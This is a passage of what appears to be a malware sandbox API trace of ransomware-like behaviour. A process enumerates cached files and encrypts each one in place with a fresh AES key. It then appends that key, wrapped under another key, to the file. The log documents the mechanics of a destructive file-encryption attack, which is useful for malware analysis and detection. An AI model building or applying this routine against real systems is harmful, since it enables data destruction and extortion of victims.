[0145.255] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x652, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x660) returned 1 [0145.255] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.255] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x660, lpOverlapped=0x0) returned 1 [0145.255] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.255] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.255] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.255] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.255] CloseHandle (hObject=0x198) returned 1 [0145.284] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.288] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.288] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.288] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.288] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.288] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", dwFileAttributes=0x80) returned 1 [0145.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.293] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=471) returned 1 [0145.293] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=471) returned 1 [0145.293] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.293] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.294] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.294] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.294] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.294] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.294] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d7, lpOverlapped=0x0) returned 1 [0145.294] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.294] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0145.294] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.294] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0145.294] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.294] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.294] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.294] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.295] CloseHandle (hObject=0x198) returned 1 [0145.311] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.316] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.316] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.316] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.316] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.316] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", dwFileAttributes=0x80) returned 1 [0145.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.317] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1518) returned 1 [0145.317] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1518) returned 1 [0145.317] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x4cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.317] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.318] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.318] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.318] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.318] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.318] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5ee, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5ee, lpOverlapped=0x0) returned 1 [0145.318] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.318] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5ee, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5f0) returned 1 [0145.318] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.318] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5f0, lpOverlapped=0x0) returned 1 [0145.318] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.319] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.319] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.319] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.319] CloseHandle (hObject=0x198) returned 1 [0145.335] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.339] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.339] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.339] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.339] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.339] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", dwFileAttributes=0x80) returned 1 [0145.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.340] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1618) returned 1 [0145.340] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1618) returned 1 [0145.340] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.340] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.341] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.341] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.341] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.342] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.342] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x652, lpOverlapped=0x0) returned 1 [0145.342] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.342] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x652, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x660) returned 1 [0145.342] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.342] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x660, lpOverlapped=0x0) returned 1 [0145.342] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.342] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.342] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.342] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.342] CloseHandle (hObject=0x198) returned 1 [0145.359] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.363] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.364] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.364] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.364] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", dwFileAttributes=0x80) returned 1 [0145.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.365] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1618) returned 1 [0145.365] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1618) returned 1 [0145.365] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x530, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.365] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.366] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.366] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.367] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.367] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.367] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x652, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x652, lpOverlapped=0x0) returned 1 [0145.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x652, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x660) returned 1 [0145.367] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.367] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x660, lpOverlapped=0x0) returned 1 [0145.367] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.367] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.367] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.367] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.367] CloseHandle (hObject=0x198) returned 1 [0145.390] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.395] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.395] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.396] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.396] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", dwFileAttributes=0x80) returned 1 [0145.397] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0145.397] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1517) returned 1 [0145.397] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1517) returned 1 [0145.397] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x4cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.397] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0145.398] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.398] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0145.399] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0145.399] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.399] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5ed, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x5ed, lpOverlapped=0x0) returned 1 [0145.399] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0145.399] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5ed, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x5f0) returned 1 [0145.399] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.399] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x5f0, lpOverlapped=0x0) returned 1 [0145.399] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0145.399] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.399] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0145.399] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0145.400] CloseHandle (hObject=0x198) returned 1 [0145.432] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.437] CryptDestroyKey (hKey=0x3b8690) returned 1 [0145.437] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.437] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0145.437] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0145.437] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", dwFileAttributes=0x80) returned 1 [0145.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js 